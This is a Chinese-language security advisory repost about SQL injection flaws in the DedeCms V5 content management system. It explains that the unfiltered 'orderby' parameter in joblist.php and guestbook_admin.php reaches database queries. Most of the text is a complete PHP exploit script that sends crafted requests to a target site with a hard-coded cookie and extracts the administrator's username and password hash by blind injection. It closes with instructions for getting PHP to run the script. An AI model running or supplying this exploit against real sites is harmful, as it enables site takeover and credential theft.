漏洞说明:DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,
对美工制作的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内最流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,
从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,
从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,
如管理员密码,加密key等等,从而控制整个网站。 漏洞厂商:http://www.dedecms.com 漏洞来源:<a href="http://www.80sec.com/release/dedecms-sql-injection.txt">http://www.80sec.com/release/dedecms-sql-injection.txt</a> 漏洞解析:在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询,造成多个注射漏洞。漏洞部分代码如下 <code> ------------------------------------------------------- if(empty($orderby)) $orderby = 'pubdate'; //重载列表 if($dopost=='getlist'){ PrintAjaxHead(); GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数 $dsql->Close(); exit(); …… function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){ global $cfg_phpurl,$cfg_ml; $jobs = array(); $start = ($pageno-1) * $pagesize; $dsql->SetQuery("Select * From #@__jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize "); $dsql->Execute();//orderby 带入数据库查询 …… ---------------------------------------------------------- </code> 漏洞利用:80sec提供攻击测试代码如下(如果发现代码无法测试,请访问80sec官方的txt文档): <code> <? print_r(' -------------------------------------------------------------------------------- DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit BY Flyh4t www.wolvez.org Thx for all the members of W.S.T and my friend Oldjun -------------------------------------------------------------------------------- '); if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to DEDEcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- '); die; } function sendpacketii($packet) { global $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo 'No response from '.$host; die; } fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $prefix="dede_"; $cookie="DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa"; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} /*get $prefix*/ $packet ="GET ".$path."/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11' HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("in your SQL syntax",$html)) { $temp=explode("From ",$html); $temp2=explode("member",$temp[1]); if($temp2[0]) $prefix=$temp2[0]; echo "[+]prefix -> ".$prefix."\n"; } $chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $chars=array_merge($chars,range(97,102));//a-f letters echo "[~]exploting now,plz waiting\r\n"; /*get password*/ $j=1;$password=""; while (!strstr($password,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $sql="orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+".$prefix."admin+where+id=1),".$j.",1))=".$i.",1,(SELECT+pwd+FROM+".$prefix."member))"; $packet ="GET ".$path."member/guestbook_admin.php?dopost=getlist&pageno=1&".$sql." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (!eregi("Subquery returns more than 1 row",$html)) {$password.=chr($i);echo"[+]pwd:".$password."\r\n";break;} } if ($i==255) {die("Exploit failed...");} } $j++; } /*get userid*/ $j=1;$admin=""; while (!strstr($admin,chr(0))) { for ($i=0; $i<=255; $i++) { $sql="orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+".$prefix."admin+where+id=1),".$j.",1))=".$i.",1,(SELECT+pwd+FROM+".$prefix."member))"; $packet ="GET ".$path."member/guestbook_admin.php?dopost=getlist&pageno=1&".$sql." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (!eregi("Subquery returns more than 1 row",$html)) {$admin.=chr($i);echo"[+]userid:".$admin."\r\n";break;} if ($i==255) {die("Exploit failed...");} } $j++; } print_r(' -------------------------------------------------------------------------------- [+]userid -> '.$admin.' [+]pwd(md5 24位) -> '.$password.' -------------------------------------------------------------------------------- '); function is_hash($hash) { if (ereg("^[a-f0-9]{24}",trim($hash))) {return true;} else {return false;} } if (is_hash($password)) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?> </code> 利用方法,下载PHP for Windows 5.2.6/4.4.9
http://down.chinaz.com/soft/8348.htm